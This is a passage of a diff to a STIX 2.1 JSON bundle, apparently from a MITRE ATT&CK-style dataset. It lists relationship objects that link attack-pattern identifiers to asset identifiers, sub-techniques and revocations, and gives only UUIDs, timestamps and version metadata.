"modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--180d62e7-7c1b-4ff6-85f3-c4eee109e442", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1823b770-b47b-429a-bbf0-dff0c5521a1b", + "created": "2024-06-27T09:22:19.196Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:22:19.196Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--182fcb76-2c2a-4c25-8831-7094a6dbecc0", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18325a10-0788-495c-b410-9a7b4b8296c5", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--184808db-ea76-4220-b3a8-31912a901416", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1865830b-511d-4302-99f7-6143647a8e40", + "created": "2023-10-02T20:23:52.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:23:52.339Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1867da62-2321-43ff-a082-703d0b5abff3", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--187f63dc-27e6-448c-ab92-c90c5c7db737", + "created": "2024-06-26T15:29:49.295Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:29:49.295Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18a176de-2ae3-4246-9e4a-8252a19e722a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18a83021-ae20-4416-9ac0-fc203ade2f14", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18a86d7f-ebe0-4dd7-a5e0-f049c884b607", + "created": "2020-02-11T18:38:56.281Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18af193c-160a-4cae-9078-4d69de5c2347", + "created": "2023-09-29T18:56:21.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:56:21.340Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18b297dd-d706-4af5-83b5-f3bcb15b09b5", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18cdfacf-4eba-4049-b85f-d1cab5106c75", + "created": "2023-09-29T18:02:01.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:02:01.822Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18e24b24-1ab6-49fd-8a40-0a5944f6bac0", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18ed5d17-fd48-4ab5-b4ed-0952dd209860", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18f1358f-8496-461e-9dfe-28ce93637d89", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18f6c945-ca75-459d-a84e-a5bec48ee262", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--18fd51df-370b-47f3-abe5-e2a2d51e4b95", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19002bc4-07dc-41f3-9391-13bcf373c67d", + "created": "2024-06-27T09:23:43.423Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:23:43.423Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1902b896-36e0-4ffe-990a-7e06b50acd93", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--190fceb6-8a05-4637-adb4-a4773009bc9a", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--191116b4-9950-4dd3-a996-4f3ade222f76", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19343108-c86b-4315-8543-7428649d8893", + "created": "2024-06-25T13:22:41.550Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:22:41.550Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19357ea1-2e21-4e35-a99e-3e3cf3321e89", + "created": "2023-02-21T20:46:57.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-21T20:46:57.248Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--193fda36-9c40-47dd-b6e5-4fed75d7e844", + "created": "2020-02-11T19:05:02.497Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--195186b0-5c3a-41b5-b3f5-81e8da21d4f7", + "created": "2024-06-26T13:44:46.623Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:44:46.623Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19660a69-84e2-4c02-a80e-2d5fc813afe3", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19a99844-1533-4c0c-8a9e-b2641cdb4140", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19ae270d-686b-4c13-94c9-ade20e57556c", + "created": "2020-03-13T21:04:13.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", + "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19da637d-4ff3-4352-b016-d85cddeabc55", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19df16da-8247-45ef-be13-ba58b1fb9c1c", + "created": "2023-09-28T20:11:23.956Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:11:23.956Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19e91761-3008-4b42-b02f-7772b3f48bb9", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19e9b914-3cb9-430c-ae02-f8e93fc2d826", + "created": "2023-09-28T21:13:49.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:13:49.529Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--19ed775b-d3cb-48ec-916a-c26e7539ccc6", + "created": "2020-02-20T14:31:35.072Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a3c2806-9ded-48d2-a4ea-a34f1893a7cc", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a3ecee5-0237-4e01-8f02-90092c15a2f0", + "created": "2023-10-02T20:18:45.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:18:45.122Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a510764-9ca9-48e5-bfad-076b98c0986a", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + 